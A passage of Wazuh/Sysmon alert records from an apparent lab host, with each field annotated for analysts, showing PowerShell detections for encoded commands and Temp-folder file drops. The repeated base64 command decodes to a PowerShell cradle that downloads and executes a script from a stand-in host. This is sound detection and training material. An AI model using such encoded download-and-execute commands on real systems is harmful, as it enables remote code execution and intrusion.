User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:08.409 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd8a-680a-970b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1816 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jawvpd1b.ilj.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:08.409 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 84 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534353.1790907 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:11.1567475Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285151 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:09.790
ProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00}
ProcessId: 12064
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00}
ParentProcessId: 1816
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:09.790 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd8d-680a-990b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12064 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd8a-680a-970b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 1816 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 88 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534353.1798974 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:11.4716773Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285155 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:11.459
ProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00}
ProcessId: 12064
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_k2zzxdgo.ova.ps1
CreationUtcTime: 2025-04-24 22:39:11.459
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:11.459 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd8d-680a-990b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12064 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_k2zzxdgo.ova.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:11.459 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 85 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534356.1801743 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:14.6764079Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285203 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:13.251
ProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00}
ProcessId: 11356
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00}
ParentProcessId: 12064
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:13.251 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd91-680a-9c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd8d-680a-990b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12064 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 89 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534357.1809814 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:14.8850196Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285208 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:14.876
ProcessGuid: {94294ddc-bd91-680a-9c0b-000000000e00}
ProcessId: 11356
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_npkr0h0g.e4e.ps1
CreationUtcTime: 2025-04-24 22:39:14.876
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:14.876 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd91-680a-9c0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_npkr0h0g.e4e.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:14.876 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 86 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534360.1812583 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:18.2193741Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285229 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:16.709
ProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00}
ProcessId: 9520
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
